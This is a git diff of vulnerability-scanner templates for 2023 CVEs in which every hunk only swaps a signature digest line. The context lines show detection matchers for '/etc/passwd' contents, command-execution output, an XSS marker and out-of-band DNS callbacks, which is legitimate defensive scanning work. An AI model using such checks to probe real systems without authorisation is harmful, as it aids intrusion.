4a0a00473045022100dc92305d342eed9bff2b49941c87cd9a974ab188c2908ff7bd7f23c4c8f0e2b70220122a54ccac0cf268d09ddecb89e8e8ac1b923dda7db8174e58415bb32e9aaea0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022060df5103e223276fb6d8f055c980a6bbe35dd67b2306bb265e79f603b1e2cdcb0221009e6c96fe2685faf298d01023b503fbee99fbd2ea6d0061279e868f5e19ad0d6a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-4547.yaml b/http/cves/2023/CVE-2023-4547.yaml index 8b9371da82..fc2dfa7bad 100644 --- a/http/cves/2023/CVE-2023-4547.yaml +++ b/http/cves/2023/CVE-2023-4547.yaml @@ -57,4 +57,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502203881baea28e873f7b5ad584cb004cc063a9d3ef0dee49650fe7b62fc6d7ffec9022100be7a7ade3690efb97076067dc73377ad9a8478b836576bc79de4f0ffc9df4190:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022029cda6ad135bffafeee5ebf0105becd915cfd86c8f9c3d8f7e80614706e35e3c02207ac440100d7b051e5d940d8a47729ba666c07b91ea0048467fcd5bc5b054a142:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-45542.yaml b/http/cves/2023/CVE-2023-45542.yaml index 279a767856..6d565cea8d 100644 --- a/http/cves/2023/CVE-2023-45542.yaml +++ b/http/cves/2023/CVE-2023-45542.yaml @@ -39,4 +39,4 @@ http: - 'contains(content_type, "text/html")' - 'contains_all(body, "", "mooSocial")' condition: and -# digest: 4a0a00473045022100de148fe4e6242e6abc19d6fe4f2669b68922af5ebaa974d857cab105774563380220725cdbee34b4e77e346808179b3b069fc13c9ddd462fc0c2e4d0ead40654f5df:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022050d66c74e9df8882762bfc2f88213f3ebb8a9d022a161abc14b7fe226651f90a022100ddb93a8f08d2392952d72477e8e791070dfe68bff1adcf671ff9e92a79541cb4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-45671.yaml b/http/cves/2023/CVE-2023-45671.yaml index 4c5ca209a2..f70d7f4030 100644 --- a/http/cves/2023/CVE-2023-45671.yaml +++ b/http/cves/2023/CVE-2023-45671.yaml @@ -41,4 +41,4 @@ http: - 'contains(header, "text/html")' - 'status_code == 404' condition: and -# digest: 490a00463044022072f73c6b300dc9b4e94b56e4753b236e144171f0420af4af0c13097305edae9e02206f5f7b3429e24d9476d31c541f16ad723124a4d8759358b86c67b9e96043b3e3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502206549e7d89d4cabf890f7dd5c47971d2d500c35cf05dc00991d8042f8ba05048702210088b175e088e53a64fcf3ee366894f0786a1449b7d949cf8fd59977c356e0501f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-4568.yaml b/http/cves/2023/CVE-2023-4568.yaml index 934220426c..b214413bbb 100644 --- a/http/cves/2023/CVE-2023-4568.yaml +++ b/http/cves/2023/CVE-2023-4568.yaml @@ -55,4 +55,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022025b4e549e5cbd393beb59ce312d7a29bca8d0ab3b16c64fcf93b2ff8aa4875d0022100bd23ccd1b14160f48ab3c24a399e2817f0d49b50869d7cc20c63a6f9a5c35920:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022045817ca3e4b06f54006a083834f2f49c2cd46518d02df1e98005b2c039428ea4022100956c32e109de21a677f32a35f4b91d7683d144ddb68a4afa6dab8e02eb69841b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-45852.yaml b/http/cves/2023/CVE-2023-45852.yaml index 40fc014d4b..2296049141 100644 --- a/http/cves/2023/CVE-2023-45852.yaml +++ b/http/cves/2023/CVE-2023-45852.yaml @@ -46,4 +46,4 @@ http: - 'contains_all(header, "application/json")' - 'contains_all(body, "traceroute: {{randstr}}: Unknown host", "daemon:x:1:1:")' condition: and -# digest: 4b0a0048304602210081c3ca1a9aa062b68de5767bf7196688722aa953aa66d1d2cb1bdc3f923cbe83022100d963ef7152e0de5b68eb3b89bfd22b0989532ba9aa9a5682f2e08f7f39c0c4ea:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502210085b2b1f764e51be689c91047cc94f5cb4198bf49f465296a7981a95eea7357ca022055981c9b3c5fb91b61bbd0832c5036724efd1b7619dfa8ef96552ad6ea14e392:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-45855.yaml b/http/cves/2023/CVE-2023-45855.yaml index 1a9ba0747d..1c08d1ff93 100644 --- a/http/cves/2023/CVE-2023-45855.yaml +++ b/http/cves/2023/CVE-2023-45855.yaml @@ -46,4 +46,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100cbd700fb07947d7ab0657ac97cf57a41ceb390ba95b91f5ebd3eb5dc4ed2246b02210086b07d8dd2293a1fc75a3d80d0c9dcf34ddff95b979e4eccefddd9d1fc606ee3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a004630440220063229418aa406537c205e10dbb0c643676c5437c17c7a2d99e3951c6af78bd902204b4c4b4a1504f52e3b18c478bdcb12099c06fa51fb4cfe83b2609fcaa6d24f0e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-4596.yaml b/http/cves/2023/CVE-2023-4596.yaml index 048586acff..e9b2f188d1 100644 --- a/http/cves/2023/CVE-2023-4596.yaml +++ b/http/cves/2023/CVE-2023-4596.yaml @@ -120,4 +120,4 @@ http: regex: - 'name="form_id" value="([0-9]+)">' internal: true -# digest: 490a0046304402200a1c235894179ebe8c3f66906af4a98bd5c47e1557fc2d02ce2971dcddf24dd702201951b001521e150f7c417b8bb7f6337c057342b9078fde8029f33a33a7306e1b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022065509c17e436af513a6aebcc13d0c76b86c749c84a580f35e76d85e651638ef0022037ff3775b4ea005336fbd9c770d899f80e6b2fe8fe715df1bb5b4d901727c1f0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-4634.yaml b/http/cves/2023/CVE-2023-4634.yaml index 83b1983004..90ada3df16 100644 --- a/http/cves/2023/CVE-2023-4634.yaml +++ b/http/cves/2023/CVE-2023-4634.yaml @@ -51,4 +51,4 @@ http: part: interactsh_protocol words: - "dns" -# digest: 4a0a00473045022100e549b41871d31392747cdd52ed45cbab5066b928e541fe6d1cd3e586fd1e3d0402205038b8281f90eead08d25ddf1e5281bf5dfd5463c328381896bd01903596e39e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100fcc2fc055a5da201109bade2e7fdeddede95aeb7a188fab06c3456e5399efa88022037681d07e7726e39aabe7ed62f0f31aea09f562101fd5bc4b0f84e32dacb6cc1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-46347.yaml b/http/cves/2023/CVE-2023-46347.yaml index c99a76fed6..fd414b8270 100644 --- a/http/cves/2023/CVE-2023-46347.yaml +++ b/http/cves/2023/CVE-2023-46347.yaml @@ -43,4 +43,4 @@ http: - 'contains(content_type, "text/html")' - 'contains(header, "PrestaShop")' condition: and -# digest: 4a0a00473045022100ba7f8d681eec29e6dd0682484b99bef70ea6763f14489f9b94b59485933301e102202d939b5e05c4199a2ae937c418c2dd3947f86b5a14d3ea6ac0fc0defe7065e50:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100fcf1fa0ab8abf930cc54e2e36e12162ce45903bb1174d276169b804569bdcbd3022100ba838fd7c91cfcf30ad83604f683acdbb55a6180642ef6b268212d503ab63407:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-46359.yaml b/http/cves/2023/CVE-2023-46359.yaml index f314c1bc5d..24d84a38c4 100644 --- a/http/cves/2023/CVE-2023-46359.yaml +++ b/http/cves/2023/CVE-2023-46359.yaml @@ -46,4 +46,4 @@ http: part: interactsh_protocol words: - "dns" -# digest: 4a0a0047304502203fa3579cee7f457c57f4c570aec49072afb073eb3669f6d1ce3fae59bda5bca8022100c56de69f4564bd736a8ec6c9c10256a835946eea129a254373943592eee6e773:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402202888b227c4fc5d9e9dbc27d36458020336b6ed8e6fcb725e333dfcdb7b41762c022029d7c176b42c015a3830d41ff3deb6ae9e2dbbe71548daabb3f1fc870bd5cba0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-46574.yaml b/http/cves/2023/CVE-2023-46574.yaml index bc3ad91ddb..60047d0dd1 100644 --- a/http/cves/2023/CVE-2023-46574.yaml +++ b/http/cves/2023/CVE-2023-46574.yaml @@ -60,4 +60,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100cec6143c8e148bcc11dd54548c3052458b343eb437ff02989f587d6b10a8ef100220443a97a1f7f060d356652fa2ee6c51d593fba94809abfbec6d342e6db08e8167:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100facb0b4f06b2e2c5209852068584070ba87ac30a8da4f41b1a3c0b06e4428d84022002157bb5bfa1a8116a1b371084cccae6663353e69520bdbad5b0d70690cfa27c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-46747.yaml b/http/cves/2023/CVE-2023-46747.yaml index 3995d27988..7242a7edba 100644 --- a/http/cves/2023/CVE-2023-46747.yaml +++ b/http/cves/2023/CVE-2023-46747.yaml @@ -105,4 +105,4 @@ http: - "commandResult" - "uid=" condition: and -# digest: 4a0a0047304502200631280cc82577d9f04af6a40e44cc38fb51e389f5af5a180e0e4eda44442ef102210091b6ea9b756def972bfe043e90ead64bddc58fbdaf68ccec09743b77a0a2883e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402204a6166b195e370aafa4a35dc97ea5b6f9d560fce6e62b0ad190525b9e9e0961c022076ba5b36c53579d2b152d64ef214f5a373cd5b9870f6e878c31e6e96ef776d57:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-46805.yaml b/http/cves/2023/CVE-2023-46805.yaml index 403d79c66c..f123a46756 100644 --- a/http/cves/2023/CVE-2023-46805.yaml +++ b/http/cves/2023/CVE-2023-46805.yaml @@ -56,4 +56,4 @@ http: - 'contains(body_2, "block_message")' - 'contains(header_2, "application/json")' condition: and -# digest: 4a0a00473045022100d20c5dc0052826ea14f0dff2969048d96672f04b90e75cb43a55f82c0cdf9b9902203f2a6f982a2068da15545263b3a76ce341cbca2cd7c16dc3d0a16e8f9bd283bd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502204ce6f60ef24fce30190ea7ba01627fbca1aed1ae80b11b7f5735c74db013d020022100b21ef93a501b8278f0621f6eb80984f16f66275b761b45d67834eeaeae10b8b5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-4714.yaml b/http/cves/2023/CVE-2023-4714.yaml index 89ad645b26..7a647f67d5 100644 --- a/http/cves/2023/CVE-2023-4714.yaml +++ b/http/cves/2023/CVE-2023-4714.yaml @@ -52,4 +52,4 @@ http: part: body regex: - 'key: "([a-z_A-Z0-9]+)"' -# digest: 4a0a0047304502207eb10bbaaa9606985258a5fcc9285e6588b5043561e22bf71d534354f33b32d1022100f2f9202c1144fa3549e6f9370b54451d794f24d2cf391fdc9a83fbb2fb76db55:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100c49434d3219e961bf9b3a2986f638e7217defeb346998ca398332577bb611a360220485c16c30e0970e454110ae41a21d5031534d48c954adceb05a6f5f92ba5f568:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-47211.yaml b/http/cves/2023/CVE-2023-47211.yaml index 87d67af3ce..5887f56639 100644 --- a/http/cves/2023/CVE-2023-47211.yaml +++ b/http/cves/2023/CVE-2023-47211.yaml @@ -116,4 +116,4 @@ http: regex: - 'Set-Cookie: opmcsrfcookie=([^;]{50,})' internal: true -# digest: 490a00463044022065e6f603f0e38ded5d6d7d64b26a3c4f033fe991d1b0bd52647d1f06a8b848de02204921a44eff428087946e64109d72ce0cb050c7167e6d3b2fa2eded319790416b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022046ba23acf7e691adb49f48326eda2454a03fe6b188cc7055424acab0a0f8f5a902210086729e6a1db300d9cb26325c7de9703a62f99b99b1fee762e8244852d1090129:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-47218.yaml b/http/cves/2023/CVE-2023-47218.yaml index 0b526d6316..2239074621 100644 --- a/http/cves/2023/CVE-2023-47218.yaml +++ b/http/cves/2023/CVE-2023-47218.yaml @@ -53,4 +53,4 @@ http: - 'contains_all(body_2, "uid=", "gid=")' - 'status_code == 200' condition: and -# digest: 490a0046304402207c91f6f27dabb2e8ec3158c1c5677a2697bf0aac61c9f7fc4f5809796f63aa65022019831152413abfd5beccfb0ff90a9c194a5ac90dec6f7b4f781be1a395042786:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100ec7d20f744003a1c2ed7444be98278cc629581cb5099e4b67f6e133003420223022100d3c72e77322b2b66a8cbdbb608afe345f84e1fb986d6f09ec3be65cb6654952c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-47246.yaml b/http/cves/2023/CVE-2023-47246.yaml index cb7aeefff9..b83f741a43 100644 --- a/http/cves/2023/CVE-2023-47246.yaml +++ b/http/cves/2023/CVE-2023-47246.yaml @@ -50,4 +50,4 @@ http: - type: dsl dsl: - "contains(body_2,'CVE_TEST') && status_code_1==200 && status_code_2==200" -# digest: 4a0a00473045022003e7cfbeaa7a27cda4e39ced19bbf29d6114eb4e89c148c4d8f8956a1fc8796b022100dadf8e853bb7b440bac6e0475e4644ee0df1cd1950b066f615e41d2202000f12:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100f7f75b62b4a54c4be8322fbe7d82e49e4b01ee263b923a0cc09b328c1854c1790221008d52673966d0c6e8085e732fa7209a3d155068e7debc5fbc2bb389c6bd254c30:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-47643.yaml b/http/cves/2023/CVE-2023-47643.yaml index 6ebb7cc060..aacf536e8b 100644 --- a/http/cves/2023/CVE-2023-47643.yaml +++ b/http/cves/2023/CVE-2023-47643.yaml @@ -68,4 +68,4 @@ http: regex: - "XSRF-TOKEN=([^;]+)" internal: true -# digest: 4a0a004730450221009867ad8a1d9d6ee3be61f018a8148d4cce2490309e5b9b91976fe18caa6b823d02204bde4220f162aeb9c5b07eb8c3a7a6fc0379c2b4408a5457efeabf457cb3f75f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502205fcff0bca02226d8721f77ef2680296485ecaa0568a076642e9814df6cbed3cb022100d0ad29dc6b9f00ecac8e36b78fcbd30a66ce73e811921b88ed3141edb35b734d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-48084.yaml b/http/cves/2023/CVE-2023-48084.yaml index b043a74b62..5736e9dbc0 100644 --- a/http/cves/2023/CVE-2023-48084.yaml +++ b/http/cves/2023/CVE-2023-48084.yaml @@ -71,4 +71,4 @@ http: regex: - 'name="nsp" value="(.*)">' internal: true -# digest: 4a0a0047304502204fbd6201bf925ccc24095849207a7b720d4bc11d315f598c77f8d89bf49bf70b022100dd8640ebaef3939c2317cc833a62e524308e3f0b1037da30858e14db33d28577:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a004630440220177500e88fc209aa5ccfdc735f5b72fd05d71b6fa2e2f3deda7fb6c7c649ebae02207d01edc1254186264417bc50548c356df3197114ca076afcf20ce87f3a2ddb59:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-49070.yaml b/http/cves/2023/CVE-2023-49070.yaml index 9810fff72f..2d706d3448 100644 --- a/http/cves/2023/CVE-2023-49070.yaml +++ b/http/cves/2023/CVE-2023-49070.yaml @@ -66,4 +66,4 @@ http: part: body words: - 'faultString' -# digest: 490a0046304402204cb018d762f46c2e5e8cb350f854276c066d67c1015036226a34c6c3775f90ba022033532329a0007b50a17936c876d60125819c0ddd3c928fe9c8f7a073477f9f23:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100cffd4ad024f079fedf1e77fb9ec9f09eae4496a27a8a6732e46740402a17f7e4022025665fe685dae977b34841487c70fb9a0e25f9c5c81c78eab968913221e623f0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-49103.yaml b/http/cves/2023/CVE-2023-49103.yaml index 539685ae88..fc3671a7cf 100644 --- a/http/cves/2023/CVE-2023-49103.yaml +++ b/http/cves/2023/CVE-2023-49103.yaml @@ -52,4 +52,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502202c85400417407f6aac6df36734965deaa263220c0230c4678102057a7d2c1943022100ab418a18a583650277b037d51eae65600cc8369ba16a577d6b75ebbbccf748a0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100a50feff13ce9b18009d5215d25e7cf2a21d76864eb3518fdcefb76fe92c51aeb02207b79b1e42efa5c35313683ff3a74ad2e4b212a8990de7e0c6675a5c1289a7740:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-4966.yaml b/http/cves/2023/CVE-2023-4966.yaml index 096227b72e..b6f5c62688 100644 --- a/http/cves/2023/CVE-2023-4966.yaml +++ b/http/cves/2023/CVE-2023-4966.yaml @@ -71,4 +71,4 @@ http: - type: word words: - '{"issuer":' -# digest: 490a00463044022077a1993e71e5fdd1862f1a2d4aa26ebf04e622ba6bbe56becbbdec39290eaf4a022045fc84cc3e43c597238379bc66e4ff39d89c0e483283a9891d37feedd9e4328f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450221008ef3592dc8e2983c4c97f1d4bd61621dc8b61c4b92f541ac08062246ab92e59b0220378f60f6ef825b07815efe45093361bf97001b1abe5e8048f150917a02b52861:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-4973.yaml b/http/cves/2023/CVE-2023-4973.yaml index 4a33bfc64c..40ebc73b1e 100644 --- a/http/cves/2023/CVE-2023-4973.yaml +++ b/http/cves/2023/CVE-2023-4973.yaml @@ -36,4 +36,4 @@ http: - 'contains(header, "text/html")' - 'contains_all(body, "", "List of tuitions")' condition: and -# digest: 490a0046304402204b8dd881b5a0b3f7d38c4d13a40eb9e39cc3726f383612727f6b2ee9cba71b9002204c739c7fc378e976f510cb9fe88163ebae00d114bc2fc1c226a888889e010c73:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502205f6ae325959f6e9980c9fb5f10847fe23ea52fbcce5d978c2509600679618ccb022100b55286c871e65450fa5435b371f8a2a4782fd00a309678790ff8d0c9f488a678:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-4974.yaml b/http/cves/2023/CVE-2023-4974.yaml index 3ffd6a8b45..ffc9dbe95d 100644 --- a/http/cves/2023/CVE-2023-4974.yaml +++ b/http/cves/2023/CVE-2023-4974.yaml @@ -43,4 +43,4 @@ http: - status_code == 500 - contains(body, "Courses") condition: and -# digest: 4a0a0047304502204ad6b4b3c504339e1eeee78972bb616e3b8b37d27deb376fb167ce3bc3897c77022100f2b344f17ba4ddc98660eb960d6550db34f15aa659a920ef055b0545daf67cd1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100e23faf9f838b029cd0f20140f8f49a5ef9527f7f4167a8a157d91b3efe02991102201e489e7e00fe8cffa6a8f05e848f7897cb133419ac2b4b50d1e79ded662667a2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-49785.yaml b/http/cves/2023/CVE-2023-49785.yaml index c0272ab872..83d09706b7 100644 --- a/http/cves/2023/CVE-2023-49785.yaml +++ b/http/cves/2023/CVE-2023-49785.yaml @@ -43,4 +43,4 @@ http: - contains(header_2,'X-Interactsh-Version') - contains(interactsh_protocol_2,'dns') condition: and -# digest: 4a0a004730450220044ba08dbbf92281a704e216fb48e6c232f709b05709515bc4ad70388bea4317022100a9e4de43629f0f51e429598a924f63d6133561711039b0e3b7ca1cdeb64e7895:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502200f5f4fba67fb181f704f72f18c9db6666aa2ff4859a5509c3338dba108adaf28022100ad3687eb82d2a9dfe75eb024c74ec79198c01a339f73d1c40b0420240c68dfae:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-5003.yaml b/http/cves/2023/CVE-2023-5003.yaml index bc43c29665..1fc02e1c68 100644 --- a/http/cves/2023/CVE-2023-5003.yaml +++ b/http/cves/2023/CVE-2023-5003.yaml @@ -43,4 +43,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100bd156a20bbfa2b8fcbab364a68192646c450da886c638558ab7c88166483aa44022100d58dac4f441a368fc420c322d67aef9bfeecadc03665b62bf18dc363f7421566:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100f09b3ed688a57aab5952bc84129c5a4465f1d37462afe7b11f99697de9611f67022100cb0ed6fbee8c0c97a590626b51b036e3f5365e5b7f09b03da4eb88aea294d47f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-50290.yaml b/http/cves/2023/CVE-2023-50290.yaml index e62cd38424..839282aa43 100644 --- a/http/cves/2023/CVE-2023-50290.yaml +++ b/http/cves/2023/CVE-2023-50290.yaml @@ -56,4 +56,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100ab90dd8cf4551a04f3e326cc482e51353c3f2f56a1df3d185a4c5339cb15443302205dca7fcd5ff9fe5fe740d2681a563cebd4075d41d70f97abad4c7d2ae2e4f160:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100dfc250b821506c211571ede1dc2ed5a1a66df436723ab98c40b9002c978410fa022100c47b941c9ef9a9b77e73bbf54e94a9ab5a094e082906629c36ae0f7bb6b2bca7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-5074.yaml b/http/cves/2023/CVE-2023-5074.yaml index 0a9a14c4a2..63b4dbf8b0 100644 --- a/http/cves/2023/CVE-2023-5074.yaml +++ b/http/cves/2023/CVE-2023-5074.yaml @@ -44,4 +44,4 @@ http: - 'contains(body, "userName") && contains(body, "passWord") && contains(body, "isEmailActivate")' - 'contains(header, "application/json")' condition: and -# digest: 4b0a00483046022100df91a0e799ab437aded5b1e9356b00c8a63803525cd7a4b511a6a90c80fe4c58022100eb14a4a52eac5c1d7dceaf823ff1aab3ad05bd419e17aac856014de6121c5f37:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a0048304602210083ee5a70d6d846d46a8a5c2535079e54eccffdf1fa56db089bfc98c4147489e3022100a8f4230b9de5251d69eec17c7c526742b63fe1a5079f762b42682e55ba8d3df8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-5089.yaml b/http/cves/2023/CVE-2023-5089.yaml index 0e7d731d2a..a17f063362 100644 --- a/http/cves/2023/CVE-2023-5089.yaml +++ b/http/cves/2023/CVE-2023-5089.yaml @@ -49,4 +49,4 @@ http: - type: kval kval: - location -# digest: 4b0a00483046022100fd7d861e3f17c0f6e97ee8e723140f3d0c5ec3a282c2dd21b03bf8892b75221502210096307b8b6a2f292b107ed285cffa2143500095d5beca7867a0488e3b1ca6b8e9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402207db7ae441786fbebf18a414fee3d3e486b2ce38371190925dba05c23476e55d1022009064d5fee882083e93c3d32c243affcca26d3840da6978d01aa971db1a33c12:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-50917.yaml b/http/cves/2023/CVE-2023-50917.yaml index 1fdec9b021..3ff945baf1 100644 --- a/http/cves/2023/CVE-2023-50917.yaml +++ b/http/cves/2023/CVE-2023-50917.yaml @@ -46,4 +46,4 @@ http: - type: status status: - 200 -# digest: 4a0a004730450220595b1f4c2aad492c7ab53117f7f5878c7d2174357e2700274d277e89dc4b74c5022100ec8ce13cf48cb89871ddb8f797b38eb2776b8811e860285e586747386d5158c4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402205a6564b18f0e91dbe2165e265eccd7fe7ef54753da65860b5b49b86fd2640ed802206b0218a9b2b042f7f703672a5aa1d2e3ca94454c0f76c916297587805f66de3e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-50968.yaml b/http/cves/2023/CVE-2023-50968.yaml index 154cbf4add..047939bafb 100644 --- a/http/cves/2023/CVE-2023-50968.yaml +++ b/http/cves/2023/CVE-2023-50968.yaml @@ -62,4 +62,4 @@ http: part: header words: - 'OFBiz.Visitor=' -# digest: 4b0a00483046022100ac3f5290f42a5505e64248fbfea21473f85564876a36a8cec075997c1c32c826022100ce68660c0cd23db374c20b2912451c2339332565ce61a6375edb5e9d85761e59:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100b358974140cef5e64159e41dd88e9e6711e0128c881498abb4c9787908e34c0d0221008557ca55d44a27fe6782e05449297d70607e1ad828f4d719347cbd72a7af7496:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-51467.yaml b/http/cves/2023/CVE-2023-51467.yaml index 3907840d23..fcdac6e0b3 100644 --- a/http/cves/2023/CVE-2023-51467.yaml +++ b/http/cves/2023/CVE-2023-51467.yaml @@ -48,4 +48,4 @@ http: part: header words: - 'OFBiz.Visitor=' -# digest: 4a0a0047304502203c57270ab59d7bb994c9c151f2d2fd77583f905570eabb408ebd6b13be0cb769022100f9c9673ed3529407d3fc42ccf9af89de53dae6afa4b72b939c0ad1c2c4a1e6bd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100dfe4f5f4220b14117763d806483b72e44e845e9457d667f7d08ec0552d0a6fe70220246d0404fcaaaa2eb000ca2831d3689ca1b8d5c4fa08e6ffdaf7ef2d0f49a15e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-52085.yaml b/http/cves/2023/CVE-2023-52085.yaml index 8a3512d641..3f002294c4 100644 --- a/http/cves/2023/CVE-2023-52085.yaml +++ b/http/cves/2023/CVE-2023-52085.yaml @@ -70,4 +70,4 @@ http: regex: - '' internal: true -# digest: 4a0a00473045022044f10a2ac5ef090fdbe4307044fba2814a499e32ea22d76b1574a346ff2ca1e0022100c28977b6ba6dea5cd3cc95c633cb2e6d9f06fafaf15d1a9a7ec2f5ffc35c278f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022055cf43348ae2d63666b5df455c64e1cc6ba5376a436ef70aea9f378a1714e70502207454984aa299e330fdd118ac85364b81ed89c9af687b1d18b0544742f73430b5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-5244.yaml b/http/cves/2023/CVE-2023-5244.yaml index 19f3a9805d..ed253e3a45 100644 --- a/http/cves/2023/CVE-2023-5244.yaml +++ b/http/cves/2023/CVE-2023-5244.yaml @@ -41,4 +41,4 @@ http: - 'contains(content_type, "text/html")' - 'contains_all(body, "alert(document.domain)", "microweber")' condition: and -# digest: 4a0a0047304502205e0b75159b6a35f3ba0a932e91972202bf83f4a1e487767247e555cf6f735881022100e1e2601bf631df27268a7b8b3d603b8a3d9e13d8d8f11a1a45da6003b4be53d6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100e016fc0a7b44a3a1885471355c0a4d24584d942a24fc88617370a727129a30c602206c38f0ad7918ebea610779e419bee24b5040a2382bdcc0fbabfeee26a84a2561:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-5360.yaml b/http/cves/2023/CVE-2023-5360.yaml index 9f2a231ddf..d75b685551 100644 --- a/http/cves/2023/CVE-2023-5360.yaml +++ b/http/cves/2023/CVE-2023-5360.yaml @@ -90,4 +90,4 @@ http: regex: - 'wp-content\\\/uploads\\\/wpr-addons\\\/forms\\\/(.*?).php' internal: true -# digest: 4a0a0047304502204665cabc6c8c44c3492f9c39c134e9b8c31ea03dbf553b0a56e0fcf05e55bb250221008335b09068b0bd294ca32ba10a94b16b44feb5888b2edf5f8d95651af7ef79ba:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 